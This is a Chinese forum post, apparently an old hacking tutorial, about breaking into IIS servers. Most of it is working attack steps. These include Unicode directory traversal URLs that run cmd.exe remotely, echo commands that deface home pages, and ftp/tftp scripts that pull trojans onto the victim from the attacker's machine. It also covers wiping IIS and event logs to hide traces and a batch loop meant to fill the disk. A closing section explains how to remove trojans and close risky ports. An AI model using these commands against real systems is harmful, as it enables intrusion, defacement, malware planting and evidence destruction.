-
关注Ta
-
- 注册时间 2009-01-23
- 最后登录 2020-10-15
-
- 发帖1303
- 在线532小时
- 精华0
- DB895
- 威望1335
- 保证金0
- 桃子0
- 鲜花0
- 鸡蛋0
-
访问TA的空间加好友用道具
|
--------------------------------- 今 天的主要内容是获得主机的信息。 我们要黑一台主机,首先要了解它的信息, 包括它的类型,用户列表,目录,端口,漏洞等等。
首先我们我们要找一台主机来练手,随便挑吧!www.flyingfish.com(乱说的)第一部,呵呵, 先在ie里看看吧,mmmm.....做的还行,挺精致的!主要是我们肯定了它现在是正常的。 然后, 我们应该知道它的ip,很简单,ping它一下就可以了。ping http://www.flyingfish.com,看看窗口里有了什么?是不是有三行回应,其中的111.111.222.222就是ip了(还是胡说的,一个例子)。有人是不是要问,我这里怎么没有。那可能是两个原因,第一,你打错命令了;第二,该主机装了防火墙禁止ping,不过这种可能很小。知道了ip,下一步应该确定端口了。下面是一些常用的端口的默认值
21--ftp 重要哦
23--telnet 欢呼吧
25-smtp 尽管重要,但似乎没什么可利用的 53--domain 同上
79--finger 可知道用户信息了
80--http 要看网页,没它不行吧
110--pop 收信的
139--netbios 共享用的,很有利用价值哦
3389--win2000超级终端 呵呵,这个好!
其实端口有上千种,这些最最常用我们怎么知道服务器有什么端口打开呢??去找个扫描器吧,x-scan ,super scan,flux等等很多哦。这里我推荐super scan ,速度很快,本站也有其教程哦!用法还是比较傻瓜的,估计大家不会有问题,轻轻几点,打开的端口就出现了。不错不错,上面说到的都有(太理想化了吧!)那么我们该如何应对呢?ps:忘了说一声,顺便扫一下7626,冰河有也说不准哦:)
若有ftp,那就用用匿名登陆。自己动手也行,最好用x-scan flux等吧!反正,有ftp就有一份希望telnet在!好!telnet 111.111.222.222,出现窗口了吧!嗯?要密码?看来网管还不是超级白痴:)随便猜个,错了,闪人!
二,一切从基础开始
由于winntsystem32cmd.exe的存在,使远程执行命令变为可能,在浏览器里输入以下请求:(假设11.11.22.22有漏洞) 11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
学过dos的应该可以看懂,其实就是利用当中的非法请求使我们可以连到system32下,如果inetpub目录不合winnt同盘,或者目录级数有改动,可能会引起请求失败。
如果成功,那么在浏览区可看到如下信息:
Directory of C:inetpubscripts
2000-09-28 15:49 〈DIR〉 .
2000-09-28 15:49 〈DIR〉 .. (假设目录中没有文件,实际上有一大堆)
是不是有自己机器的感觉了,正点!就是这种感觉!
cmd.exe相当与dos里的command.com,因此,我们可以执行很多命令了!
http://11.11.22.22/msadc/......t/system32/cmd.exe?/c+dir (这个命令同样道理)
大家请注意:/c后面的+,实际上,他就是空格,请记牢!dir开始就是dos命令了,我们可以更改一下:
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:autoexec.bat+c:winntauto.exe
会dos的朋友一定懂其意义了,不懂的请去看书 .
不用说,大家也知道我们就可以利用它来对有漏洞的机器展开攻击了! 三,实战演练
1,修改主页!(是不是很爽?)
一般主页位置在c:inetpubwwwroot下,但要是改了路径,就需要找找了。
最方便的方法:在浏览器里输入 http://11.11.22.22/.ida要是有漏洞,那在浏览器里 便会显示主页路径,这个漏洞存在率很高,自然是我们的首选。
分析法:用dir看各个盘符的根目录,看可疑的就进去看,运气好的在一分钟里找到,这要看运气和直觉。
dir/s法:首先在看其主页,找个图片或连接,看它的文件名,比如,11.11.22.22首页上有一幅图片,右击,属性,看到了吗?iloveu.gif,然后我们利用unicode输入这条命令dir c:iloveu.gif /s意味着查找c盘下所有目录里的iloveu.gif,注意实际应用时别忘了把空格改为+,如果没有继续找d盘,很快就能确定主页目录的。default.htm,defautl.html,default.asp中的一个,现在我们确定11.11.22.22中为index.htm 那么我们就修改它吧!
最方便的方法:echo法。echo是一个系统命令,主要用于设置回应开关,而echo cshu >c:autoexe.bat就是把cshu加入autoexec.bat里并删除原有内容,echo cshunice >>c:autoexec.bat 就是加入cshunice但不删除原有内容,这样我们就可以逍遥的改了。
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hackedbycshu+>c:inetpubwwwrootindex.htm 回应为:HTTP 500 - 内部服务器错误 通过对cmd的分析,袁哥得出一条简便的方法,加入"符号 11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+hackedbycshu+>c:inetpubwwwrootindex.htm
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+2001730+>>c:inetpubwwwrootindex.htm
回应为:cgi错误,不用理会
两条命令一下,呵呵,再看看11.11.22.22,是不是烙上我们的大名了?不错吧 而在实际操作中,可能袁哥的方法也会失效,这时,我们就可以copy cmd.exe为另一个exe,记住路径,用copy后的来echo
例如:11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:a.exe
11.11.22.22/scripts/..%c1%1c../a.exe?/c+echo+hackedbycshu+>c:inetpubwwwrootindex.htm
2,上传法:echo有点不讲道理,把人家的文件破坏了,要是想在主页上增光添彩,
那就应该用改好的主页上传,这个我们后面介绍。
几点忠告:
1,对于没有主页的机器(就是正在建立的主页),不要改它,这很没水准,也很没道德
2,echo前记得帮他们做好备份
3,不准在主页里加入恶性语句
2,下载文件
要是有什么有用的文件被你发现,那我们如何下载呢? 最简单的方法:把文件copy至网页目录下。copy c:emailbaby.eml c:inetpubwwwrootbaby.zip,然后, 下载11.11.22.22/baby.zip就行了,注意!实际应用中要记得对文件名进行修改,总之不能暴露。 别的方法:对不起,没想好:)
3,最重要的上传
一般方法:ftp法
首先建一个ftp脚本文件:c:hehe.haha(名字乱取把),申请一个ftp账号,然后用echo吧
echo+open ftp.cshu.com(ftp主机) > c:hehe.haha
echo+user yourname >> cc:hehe.haha (yourname是用户名)
echo+yourpasswd >> c:hehe.haha (yourpasswd是密码)
echo+get setup.exe >> c:hehe.haha 要下载的文件
echo+quit >> c:hehe.haha
完了以后:ftp+/s:c:hehe.haha,由于是ftp主机,那么速度一定很快,过一会setup.exe
就会出现在当前目录了(也就是cmd所在目录)
别忘了先上传到ftp主机,不要做马大哈哦!
最简单的方法:tftp法。
这种方法不用中转服务器,首先准备一个tftp服务端,它的作用就是把你的机器做成一个tftp服务器,
利用漏洞机器来下载(注意,运行tftp时不要运行其他的ftp软件)
在这里我推荐cisco tftp server,自己去找找把,实在没有来找我:)
安装好后运行,别忘了设置好默认目录,否则会找不到文件 tftp命令:tftp -i 1.2.3.4 GET ihateu.exe c:winntihateu.exe(ihateu.exe在默认目录里) 1.2.3.4为你的ip,用unicode运行一下,会看到tftp server里有反应了,这就好了,不一会,文件就传上去了,方便把! 学会了上传,我们就可以好好改主页,还可以上传木马,还可以把程序放上去运行…………(运行程序和在dos里一样)
4,如何清除痕迹
虽然国内主机纪录ip的不是很多,但万事小心为妙,unicode权限达不到admin。用cleaniislog行不通,就…………直接删吧!
C:winntsystem32logfiles*.*
C:winntssytem32config*.evt
C:winntsystem32dtclog*.*
C:winntsystem32*.log
C:winntsystem32*.txt
C:winnt*.txt
C:winnt*.log
全……擦掉! 四,细节问题。
1,遇到长文件名怎么办?
c:program files
就用c:"program20%files"
2,遇到空格怎么办?
20%代替喽,或者xx yy=xxyy~1
3,如何做个很大的文件?
目的就是破坏啦!我不喜欢不过教教你们啦
@echo off
echo big > c:a.a
:h
copy c:a.a+c:a.a c:a.a
goto h
注意不要乱来啊!
4,输入命令,没反应或反应不对。
:)请检查检查再检查命令的正确性,可能没有漏洞,那就闪人!
看在你看到这里那么给我面子的份上,在给你几个吧!
http://www.exsample.com/m......ystem32/cmd.exe?/c+dir+c: 或http://www.exsample.com/_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: 或http://www.exsample.com/_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
不一定有用哦!
5,如何找到unicode漏洞的主机
呵呵:)最好的方法自然是………………一个一个ping,一个一个试喽:)
不要打我呀!我说我说。最好找一个cgi扫描器,unicode查找器多如牛毛,随便找个吧!
常用端口关闭方法
113端口木马的清除(仅适用于windows系统): 这是一个基于irc聊天室控制的木马程序。 1.首先使用netstat -an命令确定自己的系统上是否开放了113端口 2.使用fport命令察看出是哪个程序在监听113端口 fport工具下载 例如我们用fport看到如下结果: Pid Process Port Proto Path 392 svchost -> 113 TCP C:\WINNT\system32\vhos.exe
我们就可以确定在监听在113端口的木马程序是vhos.exe而该程序所在的路径为c:\winnt\system32下。 3.确定了木马程序名(就是监听113端口的程序)后,在任务管理器中查找到该进程, 并使用管理器结束该进程。 4.在开始-运行中键入regedit运行注册表管理程序,在注册表里查找刚才找到那个程序, 并将相关的键值全部删掉。 5.到木马程序所在的目录下删除该木马程序。(通常木马还会包括其他一些程序,如rscan.exe、psexec.exe、ipcpass.dic、ipcscan.txt等,根据 木马程序不同,文件也有所不同,你可以通过察看程序的生成和修改的时间来确定与监听113端口的木马程序有关的其他程序) 6.重新启动机器。
3389端口的关闭: 首先说明3389端口是windows的远程管理终端所开的端口,它并不是一个木马程序,请先确定该服务是否是你自己开放的。如果不是必须的,请关闭该服务。
win2000关闭的方法: win2000server 开始-->程序-->管理工具-->服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务。 win2000pro 开始-->设置-->控制面板-->管理工具-->服务里找到Terminal Services 服务项,选中属性选项将启动类型改成手动,并停止该服务。 winxp关闭的方法: 在我的电脑上点右键选属性-->远程,将里面的远程协助和远程桌面两个选项框里的勾去掉。
4899端口的关闭: 首先说明4899端口是一个远程控制软件(remote administrator)服务端监听的端口,他不能算是一个木马程序,但是具有远程控制功能,通常杀毒软件是无法查出它来的,请先确定该服务是否是你自己开放并且是必需的。如果不是请关闭它。
关闭4899端口: 请在开始-->运行中输入cmd(98以下为command),然后cd C:\winnt\system32(你的系统安装目录),输入r_server.exe /stop后按回车。 然后在输入r_server /uninstall /silence 到C:\winnt\system32(系统目录)下删除r_server.exe admdll.dll radbrv.dll三个文件
5800,5900端口: 1.首先使用fport命令确定出监听在5800和5900端口的程序所在位置(通常会是c:\winnt\fonts\ explorer.exe) 2.在任务管理器中杀掉相关的进程(注意有一个是系统本身正常的,请注意!如果错杀可以重新运行c:\winnt\explorer.exe) 3.删除C:\winnt\fonts\中的explorer.exe程序。 4.删除注册表HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run中的Explorer项。 5.重新启动机器。
6129端口的关闭: 首先说明6129端口是一个远程控制软件(dameware nt utilities)服务端监听得端口,他不是一个木马程序,但是具有远程控制功能,通常的杀毒软件是无法查出它来的。请先确定该服务是否是你自己安装并且是必需的,如果不是请关闭。
关闭6129端口: 选择开始-->设置-->控制面板-->管理工具-->服务 找到DameWare Mini Remote Control项点击右键选择属性选项,将启动类型改成禁用后停止该服务。 到c:\winnt\system32(系统目录)下将DWRCS.EXE程序删除。 到注册表内将HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\DWMRCS表项删除。
1029端口和20168端口:
这两个端口是lovgate蠕虫所开放的后门端口。 蠕虫相关信息请参见:Lovgate蠕虫:http://it.rising.com.cn/newSite/ ... rus/Antivirus_Base/TopicExplorerPagePackage/lovgate.htm 你可以下载专杀工具:http://it.rising.com.cn/service/ ... ovGate_download.htm 使用方法:下载后直接运行,在该程序运行结束后重起机器后再运行一遍该程序。
45576端口:
这是一个*****软件的控制端口,请先确定该*****软件并非你自己安装(*****软件会给你的机器带来额外的流量)
关闭*****软件: 1.请先使用fport察看出该*****软件所在的位置 2.在服务中关闭该服务(通常为SkSocks),将该服务关掉。 3.到该程序所在目录下将该程序删除。 对于139端口攻击的防范针对不同系统的设置也有所不同,下面就来分别描述。 针对使用Windows 9x系统拨号上网用户,可以不必登录到NT局域网络环境,打开控制面板,然后双击“网络”图标,在“主网络登录”中选择“Microsoft友好登录”,不必选择“Windows网络用户”方式。此外,也不必设置“文件打印共享” 对于Windows NT用户,可以取消NetBIOS与TCP/IP协议的绑定,打开“控制面板”,然后双击“网络”图标,在“NetBIOS接口”中选择“WINS客户(TCP/IP)”为“禁用”,并重新启动计算机即可。
Windows 2000用户可以使用鼠标右键单击“网络邻居”图标,然后选择“属性”命令,打开“网络和拨号连接”对话框,用鼠标右键单击“本地连接”图标,然后执行“属性”命令,打开“本地连接属性”对话框。双击“Internet协议(TCP/IP)”,在打开的对话框中单击[高级]按钮。打开“高级TCP/IP设置”对话框,选择“选项”选项卡,在列表中单击选中“TCP/IP筛选”选项单击[属性]按钮,在“只允许”单击[添加]按钮,填入除了139之外要用到的端口。 对于个人上网用户可以使用“天网防火墙”定制防火墙规则。启动“天网个人防火墙”,选择一条空规则,设置数据包方向为“接收”,对方IP地址选“任何地址”,协议设定为“TCP”,本地端口设置为“139到139”,对方端口设置为“0到0”,设置标志位为“SYN”,动作设置为“拦截”,最后单击[确定]按钮,并在“自定义IP规则”列表中勾选此规则即可启动拦截139端口攻击了.
|